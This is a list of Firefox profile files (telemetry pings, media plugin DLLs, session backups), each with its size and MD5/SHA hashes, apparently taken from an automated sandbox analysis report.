MD5b401f1aa641a28a86084aebd7624896f
SHA1479e93c1be38baed7adf3e7b275e453304dd23b6
SHA25622a5c4936e03d8751fa40fbc21861978342f359c54a1b05fa75a2a42826591ef
SHA5124b1aa82c1acbe6057d2bdc93135f8e92a31bc4b05192b49c5a908413d9f0f646b52386354fe75e26032eddfd55a4641427db834933fe92e72879e244184c3997
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\datareporting\glean\pending_pings\64fe8044-a1a9-4919-b829-4b4ce00cf237
Filesize883B
MD51d34d84fdb475dd8dabeb427aa9ca793
SHA192b59e264fdc0a5629354c3c7b6fe4773f3b17fb
SHA256c56c544207ca1c94d118ccee3c5a34023dbfee5428c8c4b8c5fd2566482eb534
SHA512d4c64631fe31c586633e3ea08010b27086985ffe5d01664ffd2c93625223505335870159fc0db4d03df317190642c162590beb43e67b6c4e640db28c21ca463b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\datareporting\glean\pending_pings\66f7cc10-d66f-479d-b757-593e39322cfe
Filesize235B
MD5b2970e6434f129e370e61bc989f078d5
SHA13180704b40d65c2e0c11b4c8838beda4dc50a8fd
SHA256904bfe60fa7b709f34fbf74c5dcbafee9d4e2aa851a1eea64172096a4be83938
SHA512568990ca0fc343409c4fd18098357454bd43679cdd15c607773a157102003b1594d8b5360464a92ff674eab1543ff7f09e588a920b5ab298708423a4c1537b71
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\datareporting\glean\pending_pings\6a71bf7e-425d-473d-9c46-f4f21fe533b9
Filesize235B
MD5d61da2b556cafd96dd94d2aa93d088c9
SHA173d8b1a2dc19eb1a5f5c753347d4e1f543202a78
SHA25637f632afe5ca7eaf24c5b10311c1c40c5d44d89cce5b8cdefeda3eb73763e0be
SHA512ad7dfdf7d934e2ae1145306f42be3f93216a18ebf9c7ac1d7c33f8315f8b837118ba0e9ce10862696e95357f8fba91c5fa82baa01eeb5a9521ba1b8880984f13
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\datareporting\glean\pending_pings\9373267f-368a-4ec1-b544-6d5a6468820a
Filesize886B
MD554e1c81dfc82542687715fd25145acb9
SHA14906d7b9023f4447dade566a13229d99f4193205
SHA256ab5abf146038c4c1f224689eb6165e11f40351f6da67bf7a5fa99f50c4570cf7
SHA512e29e24bc1ea4ef53394a9b59f7c8f3c6bb6329e722705eac46bc09dd4a104d7fef02278321c691aea69d6cde051cbbe36009b7a80ca25a89caa5c901ea914743
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\datareporting\glean\pending_pings\b7a7311f-4dc0-4554-8cdf-708041df5511
Filesize15KB
MD5cf8f8846c2d264a3cb3e5efda0b248d0
SHA1167446b1cad6531035e7484fb72c8c85a1d4006f
SHA2566261e8ee36701705e2a57737c13e4c356c63616cc755271b44bfedd2bfae9762
SHA512bf94a3687e5e5215485df6d975438c9fadf8290cd6b5df4df467365bc3c1258bfe449dc780145ea19bf466134d3e4dee965132c61d3c5cf53299bb30109cf512
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\datareporting\glean\pending_pings\f3e6d72a-b948-4133-9485-b038b03009b8
Filesize2KB
MD5a2733a86a1446e1dc6c512703f1e3a91
SHA10c18f71fa59f0ff403b99dabe185d5942730f242
SHA2560232ae165fc3892fe4f77f582ad06040cf0f5b8770c9bcad8f86543fc42e20c6
SHA5128dbe5c3935c9a4cb2394ea94bccfaaa8f9935c33ac1c6ec0e27d7c66c068ee197999e2cbab52aa202e85deca21ab48b9b926e80711552ee9898d0477130bf89b
-
Filesize
16KB
MD5de38ae9b7a9e25cde52f1730272970a1
SHA1842a7ee1bce65250a5b787551a0a60e2bf51cd34
SHA2569735cd977fb1f6573773bcb8c8cff09a559cc80039c89bfd4712855cf044ba0d
SHA512b94d874ebd9544c420ebb4e65e500c3e385118fce250f756c254f00862c0fdd22565ccf7c69257067dea82bf6b672a863541955845fd2ad704c925afa6ccb727
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.dll
Filesize1.1MB
MD5626073e8dcf656ac4130e3283c51cbba
SHA17e3197e5792e34a67bfef9727ce1dd7dc151284c
SHA25637c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651
SHA512eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info
Filesize116B
MD5ae29912407dfadf0d683982d4fb57293
SHA10542053f5a6ce07dc206f69230109be4a5e25775
SHA256fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6
SHA5126f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json
Filesize1001B
MD532aeacedce82bafbcba8d1ade9e88d5a
SHA1a9b4858d2ae0b6595705634fd024f7e076426a24
SHA2564ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce
SHA51267dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll
Filesize18.5MB
MD51b32d1ec35a7ead1671efc0782b7edf0
SHA18e3274b9f2938ff2252ed74779dd6322c601a0c8
SHA2563ed0dec36754402707c2ae4fbfa887fe3089945f6f7c1a8a3e6c1e64ad1c2648
SHA512ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499
-
Filesize
6KB
MD57097b136eaf3cef5ff683ecbc202b9bd
SHA1e89bd883f4025f2a8d05a6feb57a9474f45cb6fb
SHA256774b9775d3bf1a76d6f500b292b6d5e373aae4f5b12aad084dd3d9e35ac193d4
SHA512ee8059ae59e58cbf11b2c16de8aa5b92acdf3beffd5326e78b9f0c63300b154cb5fe0f5f7f069d61e292a8c2ba271e08da8286487fad11645c55024c5fdc4430
-
Filesize
7KB
MD521476af827a09353dbb84187af625142
SHA1617eacf378362b0ba3458050ccfd058bdf8991c9
SHA25612a10e96dd9854d07ffc3a1925995d33f85fbec1fd43f8115bcc0dd8f6b57d9c
SHA5123ee5d88cec2265bd709632e043daf3d6f3be117a3ade98a18e2206c452cc0cbc2211aa13b7c238ec548d7b30c803a38899f4334d122fcba140fcc6d238e3c871
-
Filesize
6KB
MD55f65f746c0457f093a268eadbd9918be
SHA1ee1d3cbc1d965201e33e495d21ea867a93f3eb90
SHA2565026b6a590723cb00c3e610f601b451e7c5aace59f5855727234054021022bda
SHA512759ab8857cef8fb5e830f985eee74b61bd558a4c2b10d2c9d174e5e119fdd0b4ebd73ca7c61d8e03068a39e729403c083137c6de0a9f46df839caffc8659642a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\sessionstore-backups\recovery.baklz4
Filesize1KB
MD5b8f18c36b940cc37cacec7648e25a3cd
SHA17e246e262fcddcd601bb6b72dc61e698db495283
SHA25673f75933ba5bb3984742536f9dfb8cb46ef0d6beb889c4caf211bbb09f450077
SHA512ec73fecba5ad8af218aa3f614db22291f5e8f230fbc366911ae3f9a2b684e79275172a792c74c3ec74ea0389bc9f402b0e6671b8b45fdd1da1e2a45a84763d7f
-
Filesize
1KB
MD57f9ff0c91d2337a0534a91b6510607ac
SHA1ce76a542af77427c242e368533e486132872a3ad
SHA256741f28cfce9dde8ef5cd3a45fada7832663f462286df48a04eade0a81c1a7f18
SHA512ac4e8a68ac8eec47b88212466b7e1407c6209af152e5f79637d4c66291268e99eb579b8e7d4c77877c8b92a56df82cc9bf756652dd208468368e8c40382d5cfb